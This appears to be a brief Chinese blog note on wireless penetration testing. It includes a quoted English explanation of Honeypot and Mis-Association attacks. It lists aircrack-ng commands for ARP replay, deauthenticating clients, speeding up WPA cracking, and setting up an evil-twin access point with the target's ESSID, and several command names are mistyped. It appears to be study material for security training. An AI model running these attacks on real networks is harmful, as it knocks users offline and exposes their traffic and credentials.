1. 程式人生 > >wireless Penetration Testing & Honeypot and Mis-Association attacks

wireless Penetration Testing & Honeypot and Mis-Association attacks

重新記一遍 ,在捕獲握手資料包的時候不容易獲取,所以使用ARP請求。使用自己的無線網絡卡的地址傳送請求,會容易使得無線開啟端掉線,迫使重新連線。

   1、使用命令   aireplay-ng -3 -b aa:aa:aa:aa:aa:aa -h 目標無線MAC地址  wlanmon   其中-3表示使用APR請求


2、如何攻擊加速捕獲資料包的速度   使用命令   aireplay-ng --deauth 1 -a  目標MAC地址 wanmon



 3、使用工具 genpkm工具生成PKM  可以加速破解



5、建立一個相同名字也就是ESSID的 無線接入點    使用命令  airbase-ng -a  建立的MAC地址(隨便填一個) --essid  要模擬的無線SSID  wlanmon

使用命令 airodump-ng wlan0mon    檢視剛才新生成的 無線接入點的SSID  yaming

對要破解的無線網路接入點 實時巨集發範攻擊迫使連線的客戶端掉線。連線到自己的設定的 無線接入點上。使用命令  aireplay --deauth 0 -a 攻擊目標主機無線的MAC地址 wlanmon

可以隨機生成一個MAC地址的無線接入點   使用命令 airbase-ng --essid Rogue(ESSID) -c 11 wlan0mon


A hacker may do either of two things:
1. Silently monitor the probe and bring up a fake access point with the same ESSID the
client is searching for. This will cause the client to connect to the hacker machine,
thinking it is the legitimate network.
2. He may create fake access points with the same ESSID as neighboring ones to
confuse the user to connect to him. Such attacks are very easy to conduct in coffee
shops and airports where a user might be looking to connect to a Wi-Fi connection.
These attacks are called Honeypot attacks, which happen due to Mis-Association to the
hacker's access point thinking it is the legitimate one.

 int this here  we will do this exercise